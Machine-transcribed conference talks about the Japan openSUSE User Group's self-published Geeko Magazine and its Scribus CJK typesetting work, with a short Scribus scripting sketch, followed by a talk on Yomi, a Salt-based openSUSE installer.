A4. This issue has 44 pages and we sell it for 500 yen, which is approximately 4 euros. So why do we publish Geeko Magazine ourselves? One reason is that commercial technical magazines do not mention openSUSE; they tend to write about CentOS and Ubuntu, and they don't write articles about openSUSE. So we decided to make our own magazine with many openSUSE articles. And of course, it's fun to make a magazine ourselves. Please look at this picture: these are the covers of past Geeko Magazines. On the covers, you can usually find personified, human-like chameleons, or some stuffed chameleon toys. Why are there two types of covers? The reason is very simple: some years we cannot find a good illustrator, and in that case I take a photo of my Geeko toys and put it on the cover. So what is the content of Geeko Magazine like? This is one page of Geeko Magazine 2018 Winter. The title of this article is "Building a Kubernetes Cluster Using Kubic in 10 Minutes", written by Ashiota-san, who will talk about Kubic and software-defined storage after this session. This one is "Let's Start High-Speed Packet Processing with DPDK" — yeah, a very crazy one. This article is written by Imaxel; he's a very young guy, and he loves packet processing.
So every time he writes articles about packet processing, and this article on packet processing is very popular among readers. The last one is "How to Use Google Drive from openSUSE", written by Rippon-san. As you may know, there are several approaches to using Google Drive — for example, using the KDE integration or the GNOME integration to access it. This article explains such ways to access Google Drive and compares them one by one. He also wrote about OneDrive in the previous issue; at that time many people asked, "Why do you introduce OneDrive? Why not Google Drive?" So he decided to write about Google Drive. As I mentioned, Geeko Magazine is not a commercial magazine but a self-published one, so it is distributed not by publishers but by ourselves. Let me explain the self-publishing culture in Japan. In Japan there are many groups and individuals doing self-publishing, and for such people there is an event called Comiket — short for Comic Market. Does anyone know about Comiket? Comiket is a huge kind of festival where you can find self-published comics, and also novels, music, many kinds of stuff. Comiket is held every half year, in August and December, and it's very big: every time, half a million people come together at the biggest event hall in Japan over three days. We have a booth at Comiket — this is a picture of it. The booth is not so big because the space is very limited, and there are about five groups around us also writing technical books about open source applications. The market for self-publishing is now growing in Japan. In 2016 another event, TechBook Fest, started; 470 groups and individuals writing technical books came together, and 1,000 visitors came to buy self-published books. The Japan openSUSE User Group has had a booth twice at TechBook Fest, but it is now difficult to get a booth because too many groups want one. So far I've talked about Geeko Magazine and Japanese self-publishing culture; from now on I'll talk about how we make Geeko Magazine. The first step is the call for articles. The articles in Geeko Magazine are written by three or four members of the Japan openSUSE User Group. To collect articles, two months before Comiket I post a simple message to our mailing list, something like: "If you have some topics for the next Geeko Magazine, please reply with a title and the expected number of pages." That is all I write for the call for articles. By the way, what do the authors get in return? The only return is that authors get a copy of Geeko Magazine after Comiket — they don't get money, for example. So it's like contributing to openSUSE, or something like that. In the second step, each author starts writing a draft. We have a template in OpenDocument format, so they use LibreOffice Writer for writing the draft. The drafts are reviewed by all the authors, by each other. This picture is a screenshot of a draft; I sometimes write many comments or ask them to fix things, so this article has many comments — the yellow boxes are comments, using the comment feature of LibreOffice Writer, which the author can then address.
Even if an author is not familiar with writing technical articles, they can get advice from the other authors, not just from me, so they can take on the challenge of writing a technical article. After reviewing, the third step is design and page make-up. This is my job, and from here on I don't use LibreOffice; I use Scribus, a publishing application, which I'll describe in detail later. I copy text and images from LibreOffice and place them onto the pages in Scribus. This is important because it keeps the design consistent across all the articles. Finally, step four is printing the magazine. To print our book, I send the PDF data generated by Scribus to a print shop. Printing costs about 300 euros for 150 copies of a 48-page book, and it takes about two weeks. The print shop ships the books directly to the Comiket booth, so we just receive them there. From now on, I'll talk in a bit more technical detail about how we make Geeko Magazine. Our challenge is to edit Geeko Magazine with free/libre open source software running on openSUSE, so we don't use popular products like Adobe InDesign or Illustrator. Firstly, we use open source fonts, and then we use open source applications such as Krita and Scribus; today I will talk mainly about Scribus. The first component is fonts — we need fonts to make a book, of course. However, in 2014, when we made the first issue of Geeko Magazine, there was little choice among Japanese open source serif and sans fonts of sufficient quality: basically IPAex Mincho for serif and the M+ fonts for sans. This is because Japanese has very complex characters, so Japanese fonts tend to be expensive. IPAex Mincho is distributed under an open source license, but it is not actually developed in an open source way — it is provided by the government — while the M+ fonts are developed in an open source way. Now the situation is getting better: we have the Adobe Source Han fonts, also known as the Google Noto CJK font series, which are high-quality open source fonts with many weights. Since the last issue, we have been using the Noto Serif font and the M+ font. Then, we use Scribus instead of Adobe InDesign. Scribus is a powerful desktop publishing application, and of course it is open source; we are now using the 1.5.x SVN head for Geeko Magazine. What is special about it, compared with applications such as LibreOffice Writer? Firstly, Scribus supports CMYK color, which is necessary for offset printing. It can export the PDF/X format, a strict version of PDF, which is also necessary for sending our data to the print shop. And finally, it supports trim marks and bleed; those are also important, and I'll explain them in detail on this slide.
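Scribus also ships a built-in Python scripter, which could in principle automate parts of that page make-up step. The following is only a rough sketch under that assumption — the function names are from memory of the 1.5.x scripter API, the sizes and the file name are placeholders, and it is meant to be run from Script → Execute Script with the magazine document already open.

```python
# Rough sketch: place reviewed article text into a frame using Scribus's
# built-in Python scripter (run inside Scribus with a document open).
import scribus

if not scribus.haveDoc():
    scribus.messageBox("Geeko Magazine", "Open the magazine template first.")
else:
    # Create a body-text frame (x, y, width, height in the document's units)
    # and pour text exported from LibreOffice Writer into it.
    frame = scribus.createText(20, 30, 140, 220)
    with open("article.txt", encoding="utf-8") as f:  # placeholder file name
        scribus.setText(f.read(), frame)
    scribus.setFontSize(9, frame)
```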
So supporting Japanese is very difficult. So even Microsoft Word and LibreOffice Writer does not fully support Japanese text layout thing. So if you're interested in Japanese type setting, there is a very huge document from W3C. And so what we did, so we went on open source way. We improved Scribath together with upstream community. We are very lucky because after we started this Gigo magazine, in Scribath project, there is a sub-project of Scribath, CTL project, just started. CTL project is aimed to improve and rewrite Scribath score engine to support complex text layout, such as right to left languages used in Arabic, and also they aim to improve CJK support. I helped to improve CJK support and send many feedbacks and wrote only a few code. So since we had a very excellent committer from maybe he's Arabic native, so yeah, I just, so it was okay to send, just send feedbacks. He wrote many code for me. What is difficult in implementing Japanese and so CJK, Chinese, Japanese, Korean support? One major difference is text justification. So text justification is a feature to align text at the end of time, so which is necessary for writing books. One major difference in CJK and the European language is there's no space between words. So Scribath cannot adjust the end of line by extending spaces. So what we have to do for CJK text layout is Scribath insert implicit spaces, so in other, so all spacing between every character of, every CJK characters. And then, so the end of line is now aligned. So Scribath 1.4, which is a stable branch, does not support this CJK so justification. So first time I made Gecko magazine, I put some patches from 1.5 branch and applied to 1.4.4. Now we are using a screen head, so containing, so it's okay because those fixes are already merged. In this side I want to introduce another improvement, which is spacing between CJK and Latin letters. So to keep a clearance, we usually add a quarter space between CJK characters and Latin characters. So this one is a screenshot of first implementation. So in this implementation there is a space after E of open-sensor and Japanese letter 1. Yeah, it's okay. And second line, there is a space between Japanese character and colon. So we don't need automatic space here. So the problem is the rule is not correct or well defined. So we defined a list of characters which need space around between CJK and Latin letters. And after that improvement, now we don't have implicit space between Japanese character and colon. So the patch is very simple like this. There is a giant if and so, or sign. So maybe, so condition indicating the range of characters and they are connected with or sign. So but sometimes I think what happens with K-lib letters? I mentioned there is adding space between Latin and CJK characters. So in this implementation, K-lib characters are not supported. So maybe we still need to extend the rule for more, so, longer support. So there are the problems not resolved. There are many, but I will introduce two. The first one is Japanese input from keyboard. Fortunately, Scribath does not work correctly with Scribath main window. So we cannot enter directly from keyboard. So I usually copy text from library or other editors. And the other one is timing of some Japanese type setting rules. For example, we sometimes turn on a spacing feature I mentioned, previous slide for writing so program code onto articles because if so Scribath is adding implicit spaces onto program code, the column not aligned every characters. 
So we still need my improvement. And I want to fix some bugs by the next issue of Kiko magazine. So the remaining time is limited. Let's conclude my talk. But yeah, yeah, the quickly answered questions. And I'm pretty asked for a question. So, will you translate to our Giko magazine into other languages? The answer is no by us. But we are planning to release our Giko magazine, so archive version of our Giko magazine under creative common license. So after that, maybe everyone can translate it, but they have to understand some Japanese. So here is summary of this talk. Giko magazine is written by Japan OpenSusus group and it's self-published technical magazine and so self-publishing of technical magazine, technical books in Japan is growing. So we are maybe so riding that way. And Scribath is a powerful open source desktop publishing applications and we have improved. It improves Scribath for better Japanese support for our Giko magazine. So thank you for listening. That's all. So, yeah. Two questions. I'm planning to release archive version of Scribath file, source of our Giko magazine in creative common license. But one problem is there's no compatibility between old and current Scribath file. So that's why we choose archive version. So I will convert all version, all Scribath file to new version. For the first question, so when? The combating is not finished. So yeah, I now cannot answer when. But yeah, if I make time, I will so combat it and as soon as possible, so I will release the combat version as soon as possible. We will talk. So articles are written in English. Yeah, maybe I will. So English articles onto something. So yeah, yeah, we are welcome to come in. Japanese. It's very much. I don't know either. Maybe people, so I think when the leader of Gikomagase can understand some English articles, I believe. So yeah, maybe English articles are all fine. That's an idea, which you may be writing. Maybe it will be interesting to let people who are not that know what to speak to know about the articles. Like the word for article is to make something more open so people know what to speak to and what to do. So it means for the people that speak, the people that speak, it's open for people to understand. I don't know, so you said you write about, you will write an interview with the publisher, but I don't know, let's say you wonder how to use OBS and anybody in the producer will know about it. So you could make a list of topics you don't know much about, so other people can ask you to write about it and you publish that interview. So we will send the talk of papers to the, not only to the managers, but to the managers. So maybe the topic that I'm appealing for the user. So yeah, maybe let's make a Gikomagase with kind of global community. Yeah, it's a nice idea, but maybe editing, so yeah, editor will be very busy, I think. But yeah, it's good idea to invite more, so contents from global community. Yeah. So. Hmm. Yeah. Yeah, I think next Gikomagase have a personified version. Yeah, there are these, so there's no stuffed version. I'm not sure how it will be because yeah, I don't have so draft cover work. How long does it take from the first draft to the final magazine to work? What's the timeline? Ah. So, about two weeks, two or three weeks. I need more than one week to make a page, so we're making a scripted state. So yeah. Right? Left or right? Yeah, yeah. So, scrimmage don't support vertical layout. And, Porticon Gikomagase, yeah, we usually use, so left to right. 
Because it's like scrimmage doesn't support it and you would have to use that right. Would you prefer your magazine from top to bottom? Yeah. So articles we usually use left to right because we use many, so English words. So, top to bottom, so pushing English letters, so top to bottom layout is really difficult. It can. I know one commercial magazine using vertical layout. Yeah, to me it's too difficult to edit, I think. I never thought about the Japanese and Japanese and Japanese, but I never thought about it. Yeah, that works for it. So, it's Japanese support is maybe best among open source applications, I think. But, so using that tip, we sometimes use magazine like layout, so putting images at the edge of pages. So we use corner pages. But using the tech, it's a bit difficult because we need to know, so type native commands. Yeah, it's a bit difficult. I don't know if you know that, but I think that people would like to make it at the end, more of a term for it. And you know, like the final style between changing the style of the photo. Yeah, many people in Japan, software writing, technical articles, use Ratek. I think it's a very serious problem, but I won't think that, because that opens the possibility to translate your magazine to other languages without writing. Yeah, so, yeah, we sort of set it with, so, but maybe so they have to adjust some layout. Thank you.
Japan openSUSE User Group publishes a technical magazine every half year. The title of the magazine is Geeko Magazine. It consists of technical articles on openSUSE and applications running on openSUSE. For example, the latest issue of the magazine contains articles like "Launching Kubernetes Cluster with Kubic in 10 minutes", "Accessing to Google Drive from openSUSE", and "How to enable HTTPS with Let's Encrypt." Since 2014, we have published 9 issues of Geeko Magazine. In this talk, after explaining the culture of self-publishing in Japan, I will talk about the process from calling articles from the user group until distributing Geeko Magazine. Another topic is our challenge: editing the magazine on openSUSE. Thereby, we cannot use popular desktop publishing (DTP) applications like Adobe InDesign. Instead of such applications, we have been using Scribus, an OSS DTP application to edit Geeko Magazine. It supports CMYK color and DTP data such as trim marks and bleed areas, required by print shops. However, in 2014, Scribus was not adequate for writing a Japanese document. This is because typesetting rules are much different from English etc. To publish Geeko Magazine, we went OSS way; we have improved Scribus one by one at every issue of the magazine in cooperation with the upstream community. I will talk about a brief summary of those problems we have resolved.
10.5446/54407 (DOI)
So, hi. So welcome and thank you for coming to my talk. So I am Alberto Planas, I am part of the SUSE team. We are going to talk today about Jomi. Jomi is the acronym of Jet One More Installer. If you know something about manga or anime, you know Dr. Sojomi is a kind of door that is connecting the world of life with the world of death. So we are going to try to cross this door in the other direction with Jomi. And basically we are going to talk about how to install Open SUSE using only sold stack. So you know that there is different ways, different technologies to install Open SUSE. We have auto-jast, jast, we have many others. But we are going to use today only sold. So how many of you know about sold? What is an... Perfect, this is going to be super fast. So what is Jomi? So it's a new type of installer. It's a... As today, I really hope that it's going to change. It's only focused for the Open SUSE family. So micro-S, SLEE, Tamil root of course, LEAP. It's designed to throw installations when you have a couple of heterogeneous nodes. So imagine that you have nodes that have a different CPU, different memory configuration, different hard disks. So when you have this kind of problem, Jomi is a good match for that. In that regard, it's an alternative to auto-jast because auto-jast have this capability. So it's designed to make the installation in an attended way. So it's a way to throw thousands of, well, hundreds of installations and be complete until the end without using intervention. For that, we need to use some kind of smart configuration file. In that case, we are using... Because salt is using Jamel, we are using Jamel together with some templating gene. In this case, it's JINJA2. There are other templating genes, but Jomi is using JINJA. One of the requirements is that it's a very good thing to have some kind of central point of decision. So some kind of compute node, some kind of orchestrator that is going to make decisions when something needs to be decided. Because it's built on top of salt, we want also the... In the potent, in the potent, in the potent, sorry. So this kind of feature that an estate have that when you apply something several times, the output is going to be the same in each case. And we want something that can work alone, but mostly can work integrate into a bigger solution. So that means that we want that installation. It's nothing special during the provision of the workflow of the provision of the client. So we want that the install is only one step and maybe it's not even the first one. As I said, it's an alternative to AutoJS, I mean, AutoJS is share this kind of goals. In that case, we are not going to use any specific library. So for example, in AutoJS, we have LibStory 10G and we have another set of ecosystems, a set of libraries that are explicitly designed for the installation process. Apart from that, they are not very used. So we want, in that case, have a very small chain of dependencies. So basically nothing apart from salt. So we are going to use the upstream salt models together with the new models that we are going to provide. Those models are going to live not in Jomi, but in upstream. So everything is going to be living in salt in this project. And of course, at the very low level, we are going to use the classic tools like Parted, CHroot, BatteryFed, or CIPR. But basically the CLI that you will use if you drive the installation manually, nothing else. And if you manage that, you are going to have a set of advantage. 
One of them is that, so if you know AutoJS, you have this XML that is a profile that you design specifically for certain compute, for certain nodes in your network. The good thing about using salt is that this configuration file that is kind of present in Jomi can be managed in a very DevOps way. So you are going to use the classical tool that DevOps is going to use, like Git, NFS, database, or whatever other mechanism to manage the configuration. And they are going to reapply all this knowledge and tool for the installation process, nothing specific. I think that another benefit that is going to have is less burden for the DevOps when he need to apply the knowledge during the monitoring, inspecting logs, understanding when something goes wrong, what is happening. Because we are going to use the classic tools and the logs files are going to be in the list that always are leaving and the format and the way to extend those configuration, sorry, those log files are exactly as salt or because we are using salt basically. So there is not a specific knowledge to understand what happened when something goes wrong during the installation process. Also, it's more easy to debug what is happening and fixing. So again, the use case is very clear. So we have a cluster, this cluster has different kind of nodes. They are going to have, we can imagine in OpenStack, in Cloud, in Kubernetes, that we are going to have different kind of roles. So there are certain nodes that are going to be used for the control plane. So maybe they have a very big CPU and a lot of memory. There are nodes that are going to have not so big hard disk. So they are not going to be used for storage but they are going to be used by the CPU. There are other compute nodes or other nodes that they have very long rack of hard disk and they are going to be used for storage. That means that the kind of file system that we are going to apply on then is going to be different. So we have this kind of different nodes. Yomi is going to help us to orchestrate the installation and decide what exactly is the better way to configure this node for the use case that we want. In that regard, we need some kind of intelligence for the installer. So we don't want to separate the making decisions from the installing process. So we need some kind of mechanism that we are going to provide with Yomi. So this is a one-on-one of Sol state because most of you know about Sol. This is going to be fast. But basically, a Sol state is a configuration, my name is Solvware. So it's kind of a chef of ansible, puppet or any other one that we have. Something cool about, I think it is a specific of Sol that is very modular and you can decide how you can make the architecture of your Sol solution. So you can have an optional master. You are going to have an optional minion installed in the node. You can use, if you don't have a minion, you can use SSH for the connection and taking control of the node. You can execute certain scripts and certain states locally without the master intervention and you are going to make the same decisions. You have different kind of modules that are called reactor, minors, Sol API that is going to help you to provide a very specific solution for the kind of network that you have. And this is something that is also be very critical for Yomi because it's expected and it's doing that it's going to work for this kind of configuration. So you can use Yomi in a masterless configuration. 
You are going to use Sol API to understand what is happening inside the installation process. You can use Sol SSH to boot the straps, some initial configuration. So you have all these kind of tools and configurations for resolving the programming of the installation process. Yeah, you know, Sol is using different concept. One is the grain that is the information local to the node. One specific that describes the properties of the node that you want to address. You have something that is pillars, that is basically some kind of data that is kind of, we can say that, well, you store some certificates or configurations or you store some kind of data that is going to be used later for making decisions. You have something that are the execution modules. This module is basically some action that is executed in the minion. It's anything. So for example, it's the installation of a package or mounting a hard disk. Everything that is an action is an execution module. User is writing in Python, so everything is there. On top of the execution module, you have the states. State is like an abstraction of the one or several execution modules. So it's like a chain of action. It's more complicated than that because it's going to provide you some guarantees about the execution model that is going to be launched when the state is applied. And we have some kind of states described in a Jamel documentation file that is a way to instruct the minion to execute a salt module. So it's a kind of a state module. The typical architecture in salt is something like that. So for one side, you have salt master. Inside the salt master, you are going to have this is basically a specific matching in your network. You are going to have the pillars, so the data that is going to be shared between the minions. You have the states. You have the state in the Jamel documentation, so some document that is going to be the Jamel. You have the state module, so the Python part that is going to implement the states. And you have the execution modules, so you have everything stored there. In the other side, you have different minions. Each minion is going to publish some data that is called the grains. So everyone is going to say, OK, my MAC address is that. My IP address is this one. My ID is that. I have this number of hard disks and this number of memory. This the minion is connected through the master via a bus. So you have a channel that you can use in different ways. So it's a resource that the programmer or the user of salt can use for different stuff. But this is the bus that is used for connecting the minions with the master. And basically, this is the full architecture. You can change every element from here, but we can start thinking about that. So again, PILAS is the data. We know exactly what is the data that is the Jamel document that is going to contain the data required by the states. So if you want to apply a state, you can read the data for a specific node via the PILAS. So you can read in the PILAS what parameters you are going to pass to the states. Something interesting is that those PILAS can be mapped on top of different nodes using a query language. So depending of some specific data that is living in the node, like the grains or some other features, you can map a subset of the data to this specific node. And it's a kind of data that contains logic. So optionally, this data can have different shapes according to some logic that is applied before you apply the state in a node. So it's more than raw data. 
This is an example of a PILAS. So something raw is in the gray box. It's a description. It's not really alike. In that case, it's the description of a file system. So in that case, it's only a description of an hypothetical two hard disk or one hard disk but two partition file system. There is nothing special in this description. I decide what is going to be there and I decide what data I am going to apply that. These data have only meaning for the state. So the state need to understand that. But as the person that decide what is going to be there, I can make different choices. And again, I can provide this bit of logic in the data. So in that case, in the yellow box, we can see that there is some kind of decisions based on something that is the ID that is living in the grains data. So depending of the kind of ID, we are going to expect one file system or another depending if it's a controller or a compute node. So you have an intuition about how this kind of template mechanism can change the shape of the data that you are going to apply into the nodes. You have a state. It's again this document, jambel document that is half this shape that is going to describe what do you want to apply and which data you want to apply to a specific node. So in the top box, you can see this create, mount create file system tab. So this is a way to mount a device. This is declarative. So you can see that you are not describing how to do that. You are describing what do you want to have. The state is going to take care that if the mount point is not there, he can create that. So it can create the directory empty if it's not there. If the hard disk is not present, it's going to show an error message. If the file system is not the one that you have, it's also going to fail. And let's say that there is a lot of logic, a lot of intelligence behind this declaration. You can have below in the KX section, you can have very low level description. In that case, it's not so nice like the first one because you are executing, in that case, KX. And this is a full parameter. So you are calling KX with a full parameter, a full list of parameters that are going to send to the to the Minion. You have one word that is only if. So you have a mechanism to apply to the site. If this state can be applied or not. But you can have more intelligence in the state. In the right side, you can see that depending of the pillars, certain parameters are going to change. For example, in that case, we are going to inject one extra parameter, FAT, in case that the file system is FAT and you are providing some specific flag for this state. So you have different ways of different levels of abstractions about how to apply the states. Internally, an state is a very complicated beast. Usually you start validating the input. After that, you make a plan of the actions that you need to do in order to fulfill the goal of the state. Sometimes you don't need to do anything because you are really in the final state or stage of the state. So nothing can be done. You also have a test flag that is going to report you if you activate this flag. It's going to report you okay. I expect that I'm going to do this action and this action. I'm going to change that. So you can inspect what is going to happen before executing or applying the state. 
Something very cool is that at the end when he applied the change, recalculate again the action that needs to be done and compare the difference between the current action after applying the change and the expectation that he has. And if he finds a mismatch, it's going to report that something, I make some change but the state is not the one that I was expecting. So even if something goes wrong at the end, you are going to understand what change was applied and what element of comparison fails. If all the logic inside here goes properly, the state has a very nice property that is potentially he can fix wrong configurations. Because this is a planning and a checking, if something goes wrong in an old state, the planning will fix the broken configuration. That is always the case but it's a feature that is sometimes present. So I have a small demo. The demo is a two-note installation. Both nodes are going to be different. One of them is going to be a BIOS with a single hard disk. I want to use a swap and I want to have a group partition so you know that in legacy configuration you need to have a very small partition at the beginning to make room for group. We are going to exercise this requirement. Also the file system is going to be better first and I want to use this subvolume configuration that we have in OpenSUSE and home is going to be part of the, like this today, is going to be part of the subvolume. In the other node I'm going to use UEFI, it's a secure boot, disabled machine so security boot is going to be there but it's going to be false. It's two hard disks, one UEFI, partitions, swap, LBM, so I want to use LBM between both hard disks. I want for the root I want to use battery fast but for home like in previous OpenSUSE I want to use extra fast. So it's kind of a different configuration. So what I did here is let me show you that. All the code by the way, this demo is a small script that is living in my GitHub, a plan as a Jomie demo. The dependencies are zero, it's only one script that is living there. That one is executed, so this one is executed, you're going to have two VMs. Those VMs that you see here are booted using a Juse base image. It's a normal and classical live Juse image. Inside there we have the Soled Minion and this Soled Minion is not exactly the upstream one, it's the one that I use for the develop. So it's the Soled Minion together with a very big patch that contains the change that I upstream for Jomie in Soled. Everything that is in this patch is merged but not in the release branch but in the develop branch. So you can see in the terminal here in the big black one that I can do a ping. So what I am pinging is the Minion that is living in the live, so not the one that is living in the node. I'm going to apply the high state here. So what we are going to do now is apply the high state. Basically a high state is like the top configuration from my tree of states. It's a bit hard to explain but basically it's like, okay, I apply all the states that you want to apply for these nodes. There is an asterisk here that means apply for every node that you can find. In that case, we have only two. There is another terminal that is executing some monitor. So this monitor is a small application that I write that is going to read this buffer, sorry this bus that we saw in the architecture diagram. We are going to read from there every event that is happening there. So let's apply that. 
Basically you are not going to see anything here but if everything goes okay, you are going to start seeing some of these logs with different colors for each machine. In the right side, yes, in the right side you are going to see the state that is going to be applied here. What is happening in detail there. So let's go back to the presentation. This is going to be slow because it's going to download all the package. So this is the real thing that is happening. And let's go back to the presentation. So later we are going to visit the demo again. So what is Jomi exactly? Jomi is only a composition of those sold states. It's nothing more. It's a composition of ordering of those sold states. So each granular element in Jomi is a normal and straightforward sold state. The logic or the complexity in Jomi is how we orchestrate those states. So how we put that those states in order. In such a way that we are going to guarantee that the proper and the correct state is applied depending on the configuration that you want. So in that regard, because Jomi is a sold state, it's a composition of sold state that makes Jomi itself an state. And that means that Jomi can be applied several times without breaking your configuration, without breaking your installation. It's going to take care of understanding in which point the configuration fail and continue for that if the installation was not complete. And they take very early that the installation was done, was done successfully, and nothing needs to be done after that. So this is like a high level abstraction tree of, it's not a tree, it's three layers of abstraction. So Jomi is a sold document, it's a SLS document without logic, I mean without many details of low level stuff. And all the actions are in the sold stack layer. So in execution models on the states, that means that every time that Jomi needs some new feature, some new capabilities, that is not possible to be expressed in a sold state of its, it can be possible to be expressed as a state, it's going to be very complicated. A new feature is going to appear in upstream. So the state is going to take care of this new capability, or the execution model is going to take care of this flag or whatever. So we can see that Jomi is a very small and thin layer on top of sold. Internally Jomi is a tree. So all the logic called the complexity of Jomi is inside these three shape of states. So the root of the, or Jomi is the installer, and the first sub tree that is going to be executed is the storage sub tree. And this sub tree is going to be divided again, other sub tree like the partitioning, rate configuration, volumes, sub volumes, and other key elements that is related to storage. If one sub tree is over, there is another sub tree that is going to take care of the software. So registering the repo, installing the package, and taking care of the the sroot. In order to make sure that all the the new software is living in the proper place. After that we have another sub tree for users. Another big one for the bootloader is going to take care of configuring the bootloader. If a snapper is required, taking care that the snapper is properly configured with the, in such a way that Grapp is going to show you this menu to recover from all the other snapshots. You have some kind of cleaning or post install actions that need to be done once that the software is present, once that the user and the service are there. And later the last one is the reboot or KX execution. I tried to plot the tree in the right side. 
This is only a small part of the tree. I'm a bit old now, so the current is a bit more complicated. But with this shape we are able to extend properly the actions that are missing for a specific installation. So this sub tree or this tree is only covering the basic stuff. If you want to make more complicated configurations during the installation, there are mechanisms to inject your branch in this tree and extend the installer without changing the source code for anything. One lesson that I learned is that composability in saw is a bit tricky. We can discuss the why is tricky, but it's very obvious. Composing this saw state that are going to play nice together, so when the end of one state is going to be the precondition of the next state, maintaining this requirement is a bit tricky. Basically, there are some units problems, some preconditions are not met by the postcondition of the previous state. Some exit conditions are not taking care of the actions are not real, fails are expectations, sometimes. So these kind of elements need to be fixed upstream. And part of my job is that all those elements are properly addressed upstream. Jomi can work alone. I mean, you can, something very cool that I did for this project is that inject some kind of mechanism based on macros. So it's kind of transparent for the user and from the developer of Jomi. Some kind of macros that are going to inject certain events in this bus. So it's very easy to inspect what is happening in real time. So this previous monitor tool was showing in real time what is happening. And basically, this macro system is easy to extend and easy to, you can disable that. So it's somehow making a bit dirty the output of the installer is something that you can disable if you want. But you have a way to control using Sault API, the installation process and monitor it. So it's a way to make sure that Jomi can work isolate of the installation process, but of course, can work together with the rest of the system. So what is the current state? So let me see. Something that we did at the very early of the project is define a minimal be able product. The MVPs is still ongoing. We are not so far to finish, but we agree that we are going to end this first iteration once that open source in micro s and SLEAD are in shape. So that means that certain elements are going to be outside the initial scope of Jomi. So if you have a very fancy network configuration, very exotic devices, this is something that you can address, but only using Sault and only using the extension mechanism that Sault provide for you for the installer. What is done? So for storage, it's pretty nice. So we have GPU, BIOS partitions. We have a way to make very explicit partition schema. So you can use the pillars to be very precise of the kind of partition that you expect for certain, for your notes. So if you want to use better effects in two or three partitions, you can do that. LBN, RAID, this is done. Something that they have in place is something very cool that is a small partition. Very similar to the one that provides just, but using a linear programming. So you have this optimization algorithm that if you provide some constraint, it's going to return a solution of those constraints. And you can express the partition problem as a set of constraints. So this is a very nice way to have a very deterministic and reliable way of making decisions about sizes and maybe sizes. So this is, I have a small, there is a three, four slides at the end. 
If we have time, we can see this algorithm. If not, it's okay. FEWF, FAT1632 is there, it's in place. So you can configure fancy UEFI partitions. X2, X3, WAP, but the first sub volume, RAID only, copyright, Snapchops is there. So Snapchops is a very nice tool that is going to affect, because it's kind of orthogonal, but it's going to affect not only how you are going to partition, but how you are going to configure certain bit of software that is very far from the storage. So Snapchops is completely support. You have RAID there over devices and over partitions. This is also very tricky to do, because RAID can live on top of raw disks, but if you decide you can have a pre-partition write and partition again over the write. So this is supported. You have LBM, you have UEFI and secure boot available, you have Group 2, you have the Snapchops software, it's already there, users, a basic SIS config integration. Something very cool is that you have a full control of a CH route. So that means that you have a mechanism now in place in sold upstream. It's in develop, not in the release product. To make a full control of your CH route, so you can isolate your CH route, execute any random Python sold state inside this CH route, and this state is not going to be able to see outside the CH route. You can, there is a very nice free state that is going to guarantee that you can revert certain installations. So sometimes if you are using CH route, maybe you need some kind of software, but you don't want that software is going to be present at the end of the installation. You have this free state that is going to guarantee that the amount of software that is going to be living in the final stage of the installation is exactly the one that you require. And key exit and reboot is in place. SELT API integration, monitoring is there, sold the ordering of the state, so you have a way to require certain states and guarantee that this tree that we saw in the previous slide is going to be executed in the proper place and you have a mechanism to inject your own state inside the tree. What is missing? I mean, JAS is a very old product. It has a very long set of features. So going in the same level that JAS is not released is complicated. So LACS or LUKE is not there, so no encryption. Because an LBM class is part of the MVP, but it's not present. Resize. Resize is an extremely tricky thing to do when you are in an attended installation process, so you don't have the possibility that the user is going to inject feedback. So making decisions about what to resize and if it's okay to resize, it's going to be tricky. But it's something that we are going to take care. Basic network configuration. This is a chain. The network configuration in upstream for SUSE is not in right shape. We are going to fix that in upstream. We are going to have that in the final version of JOMI. We expect to have some basic control XML import, so you know that if you know JAS, you have a skill CD control XML file that is explaining some constraints and restrictions over the installation, so we want some kind of importing this file into your JOMI installation in order to have an equivalent installation for each product. How to just convert it. Multi-architecture is missing. And something that is ongoing for a very long time and it's my fault that it's not there. The OpenQA integration. But it's going to be there. You want to follow JOMI. You can, JOMI is an open SUSE project. Go to the open SUSE and it's playing GitHub. Find it there. 
You are going to be very surprised. I hope so. How slim, how small data is there. It's only a bunch of SLS documents, Jamel, some example of pillars, not much, but nothing else is needed. Because the real meat is living upstream. So if you go to myOBS, you are going to find the version of salt that I'm using. You are going to find there a very big patch on top of our version of salt. And this is where the meat of JOMI is living. And the good news is that it's already in the double version of salt. I have time, I think. Yeah, give me one minute. One minute and we can go to the question. So I want to talk about this linear programming thingy because I think that is super cool. So as I told you, making decisions in a reliable way about partitioning is not easy. It's not trivial. So if you saw what other guys are doing, you can see that there is a kind of logic in there, but it's very ad hoc. Sometimes it's not very clear. The rules that finally the software is using to make decisions about the partition. And not always, and in the case of partitioning, it's a very good example, not always, the rules are hard. There are certain points that the rule is extremely hard, so you can have a very small swap partition if you are expecting to froze your machine in those swap. So sometimes the rule is hard, but sometimes the rule is not very hard. So you have some room, some shadow room to move the limits of your decisions. So my proposal here is to use linear programming and express the problem of partitioning hard disk as a set of constraints. Constraints that are, some of those constraints are more hard than others. So for example, in this yellow box, we can see a set of constraints. So obviously the sum of all your partition needs to be less or equal to the amount of space that you have in your hard disk. And this is a hard rule, but not so hard because you can have some free space, but you can never have more space in the partition that the hard disk is available to provide. The hard partition needs to be between some limits. So there is a minimum expectation and maximum expectation. Again, this is not a very hard rule. So the root partition can be sometimes bigger than the one that you put in the max size. And why this is the case? Imagine that you have a really partitioned hard disk and the root is there, but it's a bit more big than the one that you have expressed in your control XML. So if you don't, if you avoid the resize and you meet this criteria, that is at least is bigger than the minimum, maybe it's not so bad to simply not take the decision of resizing or removing and recreating the root partition based on other constraints. Same for swap and home. So you can see that there is a set of logical constraints. So you have an objective function. A linear programming has these constraint and objective functions. And the goal is to minimize the objective function. So you have a function that is based on penalization. It's going to try to minimize the amount of penalization that you are going to meet if you violate some of those constraints. So you can see that if you make the decision of resize some present partition, if you make the decision of not meet the criteria of range for a partition of if you make the decision of weight some space, you are going to have penalization, but it's going to be different for each constraint. So the linear programming thing is going to resolve those constraints that provide you a solution. 
